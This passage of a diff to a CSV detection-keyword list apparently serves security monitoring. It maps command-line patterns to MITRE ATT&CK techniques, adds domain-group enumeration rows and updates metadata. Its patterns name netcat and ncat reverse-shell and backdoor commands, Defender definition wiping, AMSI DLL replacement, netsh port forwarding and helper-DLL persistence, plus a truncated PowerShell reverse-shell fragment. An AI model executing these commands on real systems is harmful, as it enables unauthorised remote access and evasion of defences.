positive !","N/A","N/A","N/A","N/A","N/A","N/A" @@ -711,9 +711,9 @@ "*mhngpdlhojliikfknhfaglpnddniijfh*","greyware_tool_keyword","WorkingVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*mjnbclmflcpookeapghfhapeffmpodij*","greyware_tool_keyword","Ultrareach VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*mjolnodfokkkaichkcjipfgblbfgojpa*","greyware_tool_keyword","DotVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*modprobe -r*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*modprobe --remove*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*modprobe rmmod -r*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*modprobe -r*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*modprobe --remove*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*modprobe rmmod -r*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*movefile64.exe /nobanner *.dll C:\Windows\System32\amsi.dll*","greyware_tool_keyword","movefile64.exe","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*mpcaainmfjjigeicjnlkdfajbioopjko*","greyware_tool_keyword","VPN Unlimited Free","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*MpCmdRun.exe -RemoveDefinitions -All*","greyware_tool_keyword","MpCmdRun","Wipe currently stored definitions","T1562.004 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" @@ -728,20 +728,30 @@ "*nbtscan -r */24*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*nbtscan -r */24*","greyware_tool_keyword","nbtscan","smb enumeration","T1135 - T1046","TA0007 - TA0009","N/A","N/A","discovery","https://github.com/charlesroelli/nbtscan","1","0","N/A","5","2","124","23","2016-05-26T20:16:52Z","2016-05-26T20:16:33Z" "*nbtstat -n*","greyware_tool_keyword","nbtstat","Displays the NetBIOS name table of the local computer. The status of registered indicates that the name is registered either by broadcast or with a WINS server.","T1049 - T1018 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat","1","0","N/A","4","10","N/A","N/A","N/A","N/A" -"*nc * -e /bin/bash*","greyware_tool_keyword","netcat","netcat shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" +"*nc * -e /bin/bash*","greyware_tool_keyword","netcat","netcat shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" "*nc -l -p * -e *.bat*","greyware_tool_keyword","nc","Netcat Realy on windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*nc -l -p * -e /bin/bash*","greyware_tool_keyword","nc","Netcat Backdoor on Linux - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*nc -l -p * -e cmd.exe*","greyware_tool_keyword","nc","Netcat Backdoor on Windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" -"*nc -u -lvp *","greyware_tool_keyword","netcat","netcat shell listener","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" +"*nc -u -lvp *","greyware_tool_keyword","netcat","netcat shell listener","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" "*nc -v -n -z -w1 *-*","greyware_tool_keyword","nc","Port scanner with netcat","T1046","TA0007","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*nc -z -v * *","greyware_tool_keyword","nc","netcat common arguments","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ncat * -e /bin/bash*","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" +"*ncat * -e /bin/bash*","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" "*ncat * -p 4444*","greyware_tool_keyword","ncat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Network Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" -"*ncat --udp * -e /bin/bash*","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" -"*neo4j console*","greyware_tool_keyword","bloodhound","he neo4j console command is used to start the Neo4j server in console mode. While it is not directly associated with a specific attack technique - it is often used in combination with tools like BloodHound to analyze and visualize data collected from Active Directory environments.","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","0","greyware tool - risks of False positive !","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*ncat --udp * -e /bin/bash*","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*neo4j console*","greyware_tool_keyword","bloodhound","he neo4j console command is used to start the Neo4j server in console mode. While it is not directly associated with a specific attack technique - it is often used in combination with tools like BloodHound to analyze and visualize data collected from Active Directory environments.","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","0","greyware tool - risks of False positive !","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*neo4j start*","greyware_tool_keyword","Neo4j","Neo4j queries - Computers AllowedToDelegate to other computers","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*net group ""Domain Admins"" /domain*","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*net group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net group *Domain Controllers*/domain*","greyware_tool_keyword","net","Query Domain Comtrollers Computers in the current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*net group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net group /domain *Domain Admins*","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*net group administrators /domain*","greyware_tool_keyword","net","showing users in a privileged group. ","T1069 - T1003","TA0007 - TA0040","N/A","N/A","Discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","10","N/A","N/A","N/A","N/A" "*net localgroup admin*","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","N/A","Discovery","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A" @@ -750,7 +760,37 @@ "*net rpc group members 'Domain Users' -W *","greyware_tool_keyword","samba","The net command is one of the new features of Samba-3 and is an attempt to provide a useful tool for the majority of remote management operations necessary for common tasks. It is used by attackers to find users list","T1087.002 - T1003.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://www.samba.org/samba/docs/old/Samba3-HOWTO/NetCommand.html","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*net view /all /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net* group Administrator* /add /domain*","greyware_tool_keyword","net","adding a user to a privileged group. This action can be used by adversaries to maintain unauthorized access or escalate privileges within the targeted environment.","T1098","TA0003","N/A","N/A","Persistence","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*net.exe* group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net.exe* group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net1 localgroup admin*","greyware_tool_keyword","net","showing users in a privileged group. ","T1069 - T1003","TA0007 - TA0040","N/A","N/A","Discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*netCat*","greyware_tool_keyword","netcat","Netcat is a featured networking utility which reads and writes data across network connections","T1043 - T1052 - T1071 - T1095 - T1132 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","http://netcat.sourceforge.net/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*netdiscover -i * -r */24*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*netscan.exe /*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" @@ -760,12 +800,12 @@ "*netsh interface portproxy add v4tov4*listenaddress=* listenport=*connectaddress=*connectport*","greyware_tool_keyword","netsh","The actor has used the following commands to enable port forwarding [T1090] on the host","T1090.003 - T1123","TA0005 - TA0002","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*netsh interface portproxy delete v4tov4 listenport=*","greyware_tool_keyword","netsh","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*netsh interface portproxy show v4tov4*","greyware_tool_keyword","netsh","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" -"*netsh.exe add helper *\temp\*.dll*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","0","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*netshrun.dll*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*netsh.exe add helper *\temp\*.dll*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","0","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*netshrun.dll*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*netstat -ano*","greyware_tool_keyword","netstat","Adversaries may attempt to execute recon commands","T1046 - T1069","TA0002 - TA0003","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*netstat -ant*","greyware_tool_keyword","netstat","View all active TCP connections and the TCP and UDP ports the host is listening on.","T1046 - T1069","TA0002 - TA0003","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*NETSTAT.EXE* -ano*","greyware_tool_keyword","netstat","Adversaries may attempt to execute recon commands","T1046 - T1069","TA0002 - TA0003","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*New-Object System.Net.Sockets.TCPClient(*$stream = $client.GetStream()*[byte[]]$bytes = 